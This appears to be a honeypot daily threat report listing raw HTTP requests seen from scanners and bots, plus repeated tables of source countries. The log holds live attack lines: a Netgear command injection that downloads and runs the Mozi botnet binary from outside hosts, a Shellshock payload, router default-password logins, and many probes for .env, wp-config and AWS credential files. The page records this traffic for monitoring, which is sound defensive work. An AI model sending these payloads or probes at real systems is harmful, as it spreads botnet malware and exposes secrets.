58	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x8B\x8F\xCF\x15\xDCV+[\x14\xFF\xFF\x8Aub\xD8\xC9:
59	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Y\xBDO\x00L\x99\xF5\x22(\x9A\x99\x02\xCF\xE2\x9B\x1A\x01A\xA1\xBF\xF2\xB7V\x99S(\xEC\xB6\x1E*\x15
60	1	GET /api_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1
61	1	GET /app.php/_profiler/empty/search/results?limit=10 HTTP/1.1
62	1	GET /app_test.php/_profiler/empty/search/results?limit=10 HTTP/1.1
63	1	GET /test.php/_profiler/empty/search/results?limit=10 HTTP/1.1
64	1	GET /symfony/_profiler/empty/search/results?limit=10 HTTP/1.1
65	1	GET /debug/_profiler/empty/search/results?limit=10 HTTP/1.1
66	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xF0\x09L\xB2\xF2[\xA1\x87\xEA\x08Q\xC5\xEC\xC7\x86V\x11\x14\x1C\xDA\xA6<\xF1U\x94\xED\xBF\xDD\x95\x16\x81f\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
67	1	\x16\x03\x01\x00\x80\x01\x00\x00
68	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x9E;\xDE]\x92\x09j\xC1s\xFA\x18\x83\xEC\xA9B\x11\x01\xCFIp;\x80\xB8\x98a6\xFB\x1F\x93\xA0\x9B\x10\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
69	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03%\xF2\x9C\x92\xBC\x5C\xD3L\xE8$JJ\xEF\x9C\xA5@\xAC\xAF\xBE\x95*\x5C\x0E\x1A%!\x83\x8E\x80\x06Lp\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
70	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Dr\xA0M/\x9C:\x84I\xE9,\xF1\x89\x10\xD0\xCD\xBF\x9B\x8C\xDAI\xB4\x16\xBC\x0EQ\xFB\xB2b\xE4X\xA9\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
71	1	\x16\x03\x01\x00\x91\x01\x00\x00\x8D\x03\x03\x9C\x9Fw\x04\xFA&\x86\xD1\xDC\x10\x88oi+(Z<\xFCn\x97\x8A\x83\x16\x22\xA8ju\x96\x19W&\x94\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
72	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x87\xB3\xC3\x8C\xBC\xAAQ\x13\x1E>\xCB\xED_\x17k\xC61,\x1AcP\xC5\x18\xCA,mJ\x86\xE1y\xE3\xFE\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
73	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xE7\x01\xAD\xA0\xBD\x8E\xE9A\x0E(\xC3\x91\xB4\x09\x22\x8F\xC8\x13\xC8O\x82\x94\x0E\xE10\x16\xF7S\xB9\xA4\xE7\xE3 \x04\x8D\xFA\xD9\x15\xF1\xFE\x1E\xF0\xE7Ut~\x05\x16\x06\x1D\xC5\xB0\xEA\xA7.\x22\x10\x11\xC7\x001\xCA\xED\xC4\xA3\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
74	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03&\x00{q&B\xBB\xEC\xEF^S\xA6\x91g\xD8\x14\xBB\x9C\xC1{\x8BD\xE9\x17\x81\xCEE\xDA\xF3\x038]\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
75	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xA6\x89\xD9\x8B7\xBEh\x9A\xD0\xD51\x08\xB3\x05\x90\x14\xA3\xB9\xBBtU\x87\x12W`1\xB7\xD7\x85\xDC\xB5f 4\xCEs[k\xF0\x9D-\xFF*\x8E\xB5Z\xB4R’\xA4\x1C\xDAv\xBD\xEBt(\x9D\xA2\xB7\xDAy\xD3\xC6K\x00>\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0+\xC0/\x00\x9E\xC0$\xC0(\x00k\xC0#\xC0’\x00g\xC0
76	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xA4F\x91\xBF\xF8Tn\xF9@7\xFE\xA2S(p\xBC2\xB1iF\xB9u`\x82<c&\xF1;9>7\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
77	1	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.184.247.7:34730/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
78	1	GET /asdf.php HTTP/1.1
79	1	GET /pinfo.php HTTP/1.1
80	1	GET /phpversion.php HTTP/1.1
81	1	GET /old_phpinfo.php HTTP/1.1
82	1	GET /infos.php HTTP/1.1
83	1	GET /php-info.php HTTP/1.1
84	1	GET /dashboard/phpinfo.php HTTP/1.1
85	1	GET /phpinfo.php3 HTTP/1.1
86	1	GET /phpinfo.php4 HTTP/1.1
87	1	GET /phpinfo.php5 HTTP/1.1
88	1	GET /_profiler/phpinfo.php HTTP/1.1
89	1	GET /laravel/core/.env HTTP/1.1
90	1	GET /beta/.env HTTP/1.1
91	1	GET /kyc/.env HTTP/1.1
92	1	GET /admin/.env HTTP/1.1
93	1	GET /prod/.env HTTP/1.1
94	1	GET /api/.env HTTP/1.1
95	1	GET /.docker/.env HTTP/1.1
96	1	GET /app/.env HTTP/1.1
97	1	GET /crm/.env HTTP/1.1
98	1	GET /backend/.env HTTP/1.1
99	1	GET /local/.env HTTP/1.1
100	1	GET /application/.env HTTP/1.1
101	1	GET /laravel/.env HTTP/1.1
102	1	GET /shared/.env HTTP/1.1
103	1	GET /.env.project HTTP/1.1
104	1	GET /apps/.env HTTP/1.1
105	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\x91\xD10?\x1A\xE8B\x0C>\xB5\xFB4[\xD9\x96\xD2\xEDr\xBC\x8D\x03\x1F\xCE \x191\xA0\xD6C\x94\x8A6 3\x7F\xCD\xD8\xA4\x06\x9B\xEC\xB6\xF7\xF2&\xDDcx\x1BQ\x10\xD9\x91\x82d\xDE\xCAO\xF3Mj\xBA\xE0\x81\x03\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
106	1	GET /index.php/_profiler/empty/search/results?limit=10 HTTP/1.1
107	1	GET /backend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1
108	1	GET /index_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1
109	1	GET /dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1
110	1	GET /debug.php/_profiler/empty/search/results?limit=10 HTTP/1.1
111	1	GET /_debug/_profiler/empty/search/results?limit=10 HTTP/1.1
112	1	\x16\x03\x01\x00\x91\x01\x00\x00\x8D\x03\x03\x01-l]\xFE\x12\xC0\x9D\x00\xD6[\x8D\xA2}\xEA\xA7{\xF6fs\xD1c\xE9\xB94\x9E\xF9r\xE0\x5C \x87\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
113	1	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.51.102.117:57880/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
114	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\xB9\x1C\xD3\xDD\xB9;\xFD\x89!\x181\xF5Qc\xD6\x9D\x8F\xC8\xCB~\x1B\xE4z2l\x13\xBB\xFC{\xA2\x18\xE1 \xFA\xE1\xF6\x8Es\x0E\x04\xF7\x1B\x9E\x16\xED\xAA\xD7\xF7T\xD88\xF3G\xFC\xEC\xD1\xDB\xC1\xFB\xD2\xDF\x15b\x03.\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
115	1	GET /.env.docker.dev HTTP/1.1
116	1	GET /.env.docker HTTP/1.1
117	1	GET /.env.dist HTTP/1.1
118	1	GET /.env.backup HTTP/1.1
119	1	GET /.env.config HTTP/1.1
120	1	GET /.env.bak HTTP/1.1
121	1	GET /info.php HTTP/1.1
122	1	GET /phpinfo.php HTTP/1.1
123	1	GET /_profiler/phpinfo HTTP/1.1
124	1	GET /development/.env HTTP/1.1
125	1	GET /.env.example HTTP/1.1
126	1	GET /.env.local HTTP/1.1
127	1	GET /.env.stage HTTP/1.1
128	1	GET /.env.travis HTTP/1.1
129	1	GET /.env.sample HTTP/1.1
130	1	GET /.env.save HTTP/1.1
131	1	GET /config/config.json HTTP/1.1
132	1	GET /wp-config.php.bak HTTP/1.1
133	1	GET /wp-config.php HTTP/1.1
134	1	GET /.wp-config.php.swp HTTP/1.1
135	1	GET /wp-config.php.old HTTP/1.1
136	1	GET /index.php/phpinfo HTTP/1.1
137	1	GET /.envrc HTTP/1.1
138	1	GET /.envs HTTP/1.1
139	1	GET /config/aws.yml HTTP/1.1
140	1	GET /symfony/_profiler/phpinfo HTTP/1.1
141	1	GET /phpinfo HTTP/1.1
142	1	GET /login?pp=enable&pp=env HTTP/1.1
143	1	GET /?pp=enable&pp=env HTTP/1.1
144	1	GET /?pp=env&pp=env HTTP/1.1
145	1	GET /.aws/credentials HTTP/1.1
146	1	GET /config.js HTTP/1.1
147	1	GET /:80/.env HTTP/1.1
148	1	GET /:443/.env HTTP/1.1
149	1	GET /:432/.env HTTP/1.1
150	1	GET /:8000/.env HTTP/1.1
151	1	GET /:8080/.env HTTP/1.1
152	1	GET /tool/view/phpinfo.view.php HTTP/1.1
153	1	GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1
154	1	GET /admin/app.js HTTP/1.1
155	1	GET /admin/server.js HTTP/1.1
156	1	GET /symfony/public/_profiler/phpinfo HTTP/1.1
157	1	GET /symfony/public HTTP/1.1
158	1	GET /api/config.js HTTP/1.1
159	1	GET /config/environments/database.rb HTTP/1.1
160	1	GET /?pp=env HTTP/1.1
161	1	GET /appsettings.json HTTP/1.1
162	1	GET /admin/wp-config HTTP/1.1
163	1	GET /wp-config.php-backup HTTP/1.1
164	1	GET /config.ini HTTP/1.1
165	1	GET /config/settings.py HTTP/1.1
166	1	GET /server/settings.py HTTP/1.1
167	1	GET /storage/logs/laravel.log HTTP/1.1
168	1	GET /Lara/.env HTTP/1.1
169	1	GET /application/config/constants.php HTTP/1.1
170	1	GET /dev/phpinfo.php HTTP/1.1
171	1	GET /php_info.php HTTP/1.1
172	1	GET /install/index.php HTTP/1.1
173	1	GET /config.php HTTP/1.1
174	1	GET /php.php HTTP/1.1
175	1	GET /config/app.php HTTP/1.1
176	1	GET /.env.php HTTP/1.1
177	1	GET /public/.env HTTP/1.1
178	1	GET /content/.env HTTP/1.1
179	1	GET /admin/server_info.php HTTP/1.1
180	1	GET /core/.env HTTP/1.1
181	1	GET /old/.env HTTP/1.1
182	1	GET /api/config.env HTTP/1.1
183	1	GET /api/shared/.env HTTP/1.1
184	1	GET /api/shared/config/.env HTTP/1.1
185	1	GET /dev/.env HTTP/1.1
186	1	GET /config.env HTTP/1.1
187	1	GET /api/shared/config.env HTTP/1.1
188	1	GET /api/shared/config/config.env HTTP/1.1
189	1	\x16\x03\x01\x00\x80\x01\x00\x00
190	1	\x16\x03\x01\x00\x90\x01\x00\x00\x8C\x03\x03\x89\x0C\xBC\xF9z\x89\xD8\xF9 Hb\x85\xC8`\xDA\x9E\xF8\x98\x9F\x18f\xF6\x9B\x16S$\xFB\xF1\xAF\x7F\xCE\x0C\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
191	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x92,,Y\xF8%_\xA1\xCB\x5C+\x8E\x8F\xD5\x10\x08?\xB3VP=\x89%M\xED~ \xBBGA\xD0u\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
192	1	\x16\x03\x01\x00\x92\x01\x00\x00\x8E\x03\x03\xEB}U6\xBF\xE5,\x0E\xA9\xBF\x22\xC6\x9B\xDE=
193	1	POST /GponForm/diag_Form?images/ HTTP/1.1
194	1	GET /server_info.php HTTP/1.1
195	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03Y\xFFiu\x00)J\xACU\xEC\x8B\xF5H\x1E\xDE\x1C\x80\x93:\xAD~\x01\x8A\xBB\xD2JeT`\xC2\xFC\x1B \xF5\xC8\xCFK\xFD\xBFB\xAC\xEA\x1B?Y\x8B\xEE\x85\x87\xF1\xFA\x1A\x98\x04\xF0\xFD}\xE2\xF8\xE3\x9E\x09jE\x87\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
196	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03a
197	1	\x16\x03\x03\x01\xA5\x01\x00\x01\xA1\x03\x03\xAB1\x93\xCD\xBD\xDF{\x1B\xF2\xF0\xB3\xAA\xAE\xE8l?\xD2(\xE2\xBC\xBA\xF1\xDFi\x1F\x87\xCF2\x9C\x12\x10\xA4 4%n\xFA\x0E\xEA\x02\xC2\x0B\x9E;v\xD4\x9Aa\xBA\xF8\x00!
198	1	\x16\x03\x03\x01\xA5\x01\x00\x01\xA1\x03\x03\xE1\xDD&1\xEEADBh\xF1Z(\x04\xE5\x0C$\x9F\xCB\xCBa\xF1 \xF8MFk\xD9\x00\x18Ln\x1D \xFD\x01,\x9E\xF3I\xB8\xF2\xEB\xF4\xA8\x06-\x10\x07\xFF<\xA1M4\xDD\xB4/\xA4 \xCC\xE1\x13\x1D
199	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCBt:C8\xA12BI\xFC\xED\xB9@\x1D\xC6\x82\x06\xCC\xC3Hkb\x01}\xFA\xBEZpIs#\x1E\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
200	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x8F\x12\xF5a\xF2\xAB\xC6\x8A\x91\xD4\xE3\xA3w\x8C\xC41\xAD:`\x1A\x9E\x8A\xB0\x12\x8DL\xF3\xA2\xFB\xD4\x04\x8A\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
201	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x031uWY\x0B\x1B\x02\x8D\x1D0\x91\x04KM@F\x96\x0E\xA0,\xD1\x8F\xB6-\xA2\xF1\xF2n\x08\xA5r:\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
202	1	\x16\x03\x01\x00\x90\x01\x00\x00\x8C\x03\x03\xC8P\x97x\xFB\xBCw\xF6\x93\x8B\x96\x0B}b^j\xDE
203	1	\x16\x03\x01\x00u\x01\x00\x00q\x03\x03\xB6WlQp\xC4\xEC\xA2}\xD7\x22\xE0\xA1\x22\x07\x1C\xB3\xF0\xDF\x17\xED\xA9\xC9\xA2\x7FT\x06O\xF9\xD6\xA7:\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
204	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x8F5\x9D\x80\x12\xAA\x81\xE3\xF4\x80\xFB\xF5D\x88\x07\x053\xDA\x83B\xA6R\x1Ex\xA7\x11`\xEE\x7F5\xED\x00\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
205	1	GET /Media/Images/54FA37E3.PNG HTTP/1.1
206	1	GET /login.cgi?username=telecomadmin&psd=telecomadmin HTTP/1.1
207	1	h+/tmp/gpon80&ipv=0
208	1	GET /socket.io/1/?t=1739039779657 HTTP/1.1
209	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xDC\xA6\xBF\xEF\x8D\xDC\xE4\xD1\x9Ez\xEC\xB7@\xC1v\x1A\x93,K<\x1F_\xD7\xDB\xC4{q\xC1\xF6V\xC4m\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
210	1	GET /admincontrol/sys_phpinfo.php HTTP/1.1
211	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x19g\xE5\xE4*\xB6K@\xA3’\x8D\xF5K1\x80\xD2\x17$\xF2\xBA\xD8\x1FC
212	1	GET /login.cgi?username=admin&psd=admin HTTP/1.1
213	1	GET /login.cgi?username=awnfibre&psd=fibre@dm!n HTTP/1.1
214	1	GET /login.cgi?username=admin&psd=1234 HTTP/1.1
215	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xF2s\xCF<*’\x9F1\xB6\x07\xC9\x17\x0C\x5C\xF1\xA5QD\xD6uF\x9E\xA3\x9A\xEF\x09\xFA\x90\xA3\x8AX\x06\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
216	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xE4\x93j\x9C\xAC2)%@H*\x10\xC64\xD8\x02\xC1\xE2<i\x06\xD8\xD9\xEC\xCF5BU\xBA\x00a4 \x04\x8A\x04\x88\xCD\xE78\x13\x89\x11\x87\x90\xF9^\x1F\xE3\xE5\x00\xEC\x86\xF4\x84\xDF\xAA\xC5E\xE4\x12+]l$\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
217	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xF1x\x15z;Ikb\xADw\x03\xF1\xE8\xB8\xDD\x02\xB3\xDD:\xF6\xB9\x1F)\xAF_\xA3A\xCDEiz\x9E\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
218	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x9E\xD2\x04\xEA\x02\xF8;Z\xE7.U\x08\x058\xF6\x0C\x83\x98\x162O\x85\x91\xA3\x9F\xC3\x8D\xA2\x81\x1F\xF6!\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
219	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE5\x17\x8EZ/\x22\x0B4\x84;\xFE\xD5\x9Dh2\xFB\x0F@71\xD7g\xFB\x00Ji\xC8\x1E-\xADC\xB9\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
220	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03T\xF4\x0E1\x01\xE2\xC3\xF9,I_\xA1m)\xDC\xDE\xE3S\xBEL\x9A^=Y\xA3\xB9\xB1\xEBa\x08h\xC7\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
221	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCB\xEF\x8C@v\xBC\xB2\x82\xD7\xE5\xAF\x8D\x0CJG\xE9&\x91\xE7\xA0\xA5=\x15\xC9\x8E\xE4\xFF\xDFjn\xD2(\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
222	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xD1\xEFyN
223	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xB7\x81t>\xAB\xD0\x9CdiO\xC9\xD3]\xB5\x98\x95d(\xE4
224	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03&t\x18\xE2\xF4C\x01,B\xE4\x1B\xA9x\xC9\x1D:W_\xC4\xCE\x87\xB8\xF0\xAA,`\xFBL \x9B\xE6\xB1\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
225	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x09I~V\xE9\x16N\xC2\xCE\xC7E\xF3\xC7H \xF3z\x0CZ\x0C\x05u\xBCY\x1B\xCD\xCF^\xCD\xF2\xF2\xBB\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
226	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03[\x90\x8B\xF3\x8A\xF7\xDB\xAC9m^\x8DH\xCE\xBD\x1E\xEB\xF5O\xC2\x1Ar
227	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x89q\xEC\x18\x06\xA8nd’M8\x01(\x03}\x15\x1B^ \xDB\x9Dz\xA3\x99\xD5\xBEGa2@\xD01\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
228	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE2k\x02\xF5\x1A\x15\x98/\xD3\xAD6\x93\x8DY\x97\xD4j`m\x86\xAB\x0B&=\x00\xA3f\xB4\x01\x81xf\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
229	1	\x16\x03\x01\x00\x92\x01\x00\x00\x8E\x03\x03P\x95k\xCCT\xCE\xD9\xDE\x12\x17\xFF\xF4\xF9\x06\xBF\xABc8c+w\x85\x8Bi\xD5n\x91\x22\xB6\xB7\x13\xD1\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
230	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x9AA\x02=\xB0\xD4’E.\xE6\xDCn{\xA4\x9B{\xF6\x1E\xD2\x03\xF8\xF0n*\xD6\x10\xFE8\xE7\xDC\x9Cy\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
231	1	POST /HNAP1/ HTTP/1.0
232	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03H\xA77P=\xBB\x14\xF5\x93
233	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xAB\xEE)]\xFC\x87\xB4b\x11pI\xB2\xE6\xB1!\xFE\xAD
234	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03-9\x00\x14\xE2\xD5<\xB6km\xDC=\xA5\xAB\x10\xE3\xCD\x15&\xEB{%\x1C`<\xE9\xE1\xA9\x02\xEE>4\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
235	1	GET /cgi-bin/jarrewrite.sh
236	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03)\xCC<\xA1\x1A\x06 \xB2\xEAu\xC6\xAEm\xB5\xC4\xD4\x11\xB5\xD2\x8C;
237	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xD8\xB6\x98\xBF\xFD\xF6\xAFs\x89\x02\xB9s\x99\x06JP[72Js\xBD\xD3C\x82\x9B\xE0LH\x05m^\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
238	1	GET /cgi-bin/jarrewrite.sh HTTP/1.1\x5Cr\x5CnUser-Agent: () { :; }; echo ; /bin/bash -c \x22ping -c 1 194.107.126.7\x22\x5Cr\x5Cn\x5Cr\x5Cn
239	1	GET /site/login HTTP/1.1
240	1	OPTIONS / RTSP/1.0
241	1	OPTIONS / HTTP/1.0
242	1	GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0

country_iso_code
#

	number_of_occurence	country_iso_code
0	228	US
1	201	NL
2	125	FR
3	80	CH
4	49	GB
5	29	PL
6	23	CA
7	20	UA
8	15	JP
9	10	IN
10	9	CN
11	9	SG
12	9	BG
13	8	BE
14	8	IL
15	8	RU
16	7	DE
17	6	ZA
18	6	PT
19	5	AZ
20	4	IR
21	3	CI
22	2	NO
23	2	BR
24	2	IT
25	1	SC
26	1	AU
27	1	NG
28	1	VN
29	1	BD
30	1	KR
31	1	CZ
32	1	HU
33	1	TW

Report: 2025-02-07

7 February 2025·4979 words

Repport Daily

Report: 2025-02-06

6 February 2025·3582 words

Repport Daily

Report: 2025-02-05

5 February 2025·3789 words

Repport Daily

	number_of_occurence	country_iso_code
0	228	US
1	201	NL
2	125	FR
3	80	CH
4	49	GB
5	29	PL
6	23	CA
7	20	UA
8	15	JP
9	10	IN
10	9	CN
11	9	SG
12	9	BG
13	8	BE
14	8	IL
15	8	RU
16	7	DE
17	6	ZA
18	6	PT
19	5	AZ
20	4	IR
21	3	CI
22	2	NO
23	2	BR
24	2	IT
25	1	SC
26	1	AU
27	1	NG
28	1	VN
29	1	BD
30	1	KR
31	1	CZ
32	1	HU
33	1	TW

	number_of_occurence	country_iso_code
0	228	US
1	201	NL
2	125	FR
3	80	CH
4	49	GB
5	29	PL
6	23	CA
7	20	UA
8	15	JP
9	10	IN
10	9	CN
11	9	SG
12	9	BG
13	8	BE
14	8	IL
15	8	RU
16	7	DE
17	6	ZA
18	6	PT
19	5	AZ
20	4	IR
21	3	CI
22	2	NO
23	2	BR
24	2	IT
25	1	SC
26	1	AU
27	1	NG
28	1	VN
29	1	BD
30	1	KR
31	1	CZ
32	1	HU
33	1	TW

Daily Report: 2025-02-08#

botnet_dropper_behaviour#

list_of_source_IP_addresses#

user_agent#

request#

country_iso_code#

Related

Daily Report: 2025-02-08
#

botnet_dropper_behaviour
#

list_of_source_IP_addresses
#

user_agent
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	228	US
1	201	NL
2	125	FR
3	80	CH
4	49	GB
5	29	PL
6	23	CA
7	20	UA
8	15	JP
9	10	IN
10	9	CN
11	9	SG
12	9	BG
13	8	BE
14	8	IL
15	8	RU
16	7	DE
17	6	ZA
18	6	PT
19	5	AZ
20	4	IR
21	3	CI
22	2	NO
23	2	BR
24	2	IT
25	1	SC
26	1	AU
27	1	NG
28	1	VN
29	1	BD
30	1	KR
31	1	CZ
32	1	HU
33	1	TW